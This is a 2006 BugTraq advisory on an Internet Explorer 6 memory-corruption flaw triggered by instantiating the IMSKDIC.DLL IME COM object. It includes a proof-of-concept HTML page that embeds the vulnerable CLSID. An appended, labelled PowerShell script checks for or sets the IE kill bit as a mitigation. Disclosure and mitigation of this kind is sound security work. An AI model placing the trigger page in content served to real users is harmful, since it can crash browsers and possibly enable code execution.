BugTraq
[XSec-06-02]: Internet Explorer (IMSKDIC.DLL) COM Object Instantiation Vulnerability Aug 15 2006 03:15PM
nop (nop xsec org)
Advisory ID:
XSec-06-02

Advisory Name:
Internet Explorer (IMSKDIC.DLL) COM Object Instantiation Vulnerability

Release Date:
08/15/2006

Tested on:
Internet Explorer 6.0 SP1 on Microsoft Windows XP SP2 CN

Affected version:
Internet Explorer 6.0

Author:
nop <nop#xsec.org>
http://www.xsec.org

Overview:
A vulnerability has been found in Internet Explorer 6.0. When Internet Explorer tries to instantiate the IMSKDIC.DLL (Microsoft IME) COM object as an ActiveX control, it may corrupt system memory in a way that lets an attacker cause a denial of service and possibly execute arbitrary code.

Exploit:
=============== IMSKDIC.DLL.htm start ================

<!--
// Internet Explorer (IMSKDIC.DLL) COM Object Instantiation Vulnerability
// tested XP SP2 CN

// nop (nop#xsec.org)
// http://www.xsec.org

// CLSID: {6E3197A3-BBC3-11D4-84C0-00C04F7A06E5}
// Info: Microsoft IME SingleKanjiDictionary interface
// ProgID: IMESingleKanjiDict.8.1
// InprocServer32: C:\WINDOWS\IME\imjp8_1\Applets\IMSKDIC.DLL

--!>
<html><body>
<object classid="CLSID:{6E3197A3-BBC3-11D4-84C0-00C04F7A06E5}" ></object>
</body></html>

=============== IMSKDIC.DLL.htm end ==================

Link:
http://www.xsec.org/index.php?module=releases&act=view&type=1&id=8

About XSec:
We are redhat.
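
A defensive check for the COM object named in this advisory, as an added example that is not part of the original post: the PowerShell script below reports whether the Internet Explorer kill bit (the 0x400 bit of "Compatibility Flags" under the "ActiveX Compatibility" key) is set for the advisory's CLSID and, when run with -Apply, sets it while preserving any existing flags. Using the kill bit as the mitigation is an assumption of this example; the advisory itself names no fix.

```powershell
# Added example: audit (and optionally set) the IE kill bit for the CLSID
# in this advisory. Run elevated; pass -Apply to write the registry value.
param([switch]$Apply)

$Clsid   = '{6E3197A3-BBC3-11D4-84C0-00C04F7A06E5}'   # CLSID from the advisory
$KillBit = 0x400                                       # IE "do not instantiate" flag
$Name    = 'Compatibility Flags'

# 32-bit IE on 64-bit Windows reads the Wow6432Node view, so cover both.
$Roots = @(
    'HKLM:\SOFTWARE\Microsoft\Internet Explorer\ActiveX Compatibility',
    'HKLM:\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\ActiveX Compatibility'
)

function Get-CompatFlags([string]$KeyPath) {
    # Returns the current flags, or $null when the key or value is absent.
    $item = Get-ItemProperty -LiteralPath $KeyPath -Name $Name -ErrorAction SilentlyContinue
    if ($null -eq $item) { return $null }
    return $item.$Name
}

foreach ($root in $Roots) {
    if (-not (Test-Path -LiteralPath $root)) { continue }   # registry view not present
    $key   = Join-Path $root $Clsid
    $flags = Get-CompatFlags $key
    $isSet = ($null -ne $flags) -and (($flags -band $KillBit) -ne 0)

    if ($isSet) {
        "{0}: kill bit already set (flags 0x{1:X})" -f $key, $flags
        continue
    }
    if (-not $Apply) {
        "{0}: kill bit NOT set" -f $key
        continue
    }

    # Create the per-CLSID key if needed, then OR the kill bit into the flags
    # so any other compatibility bits already present are kept.
    if (-not (Test-Path -LiteralPath $key)) { New-Item -Path $key -Force | Out-Null }
    $new = if ($null -eq $flags) { $KillBit } else { $flags -bor $KillBit }
    New-ItemProperty -LiteralPath $key -Name $Name -PropertyType DWord -Value $new -Force | Out-Null
    "{0}: kill bit set (flags 0x{1:X})" -f $key, $new
}
```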
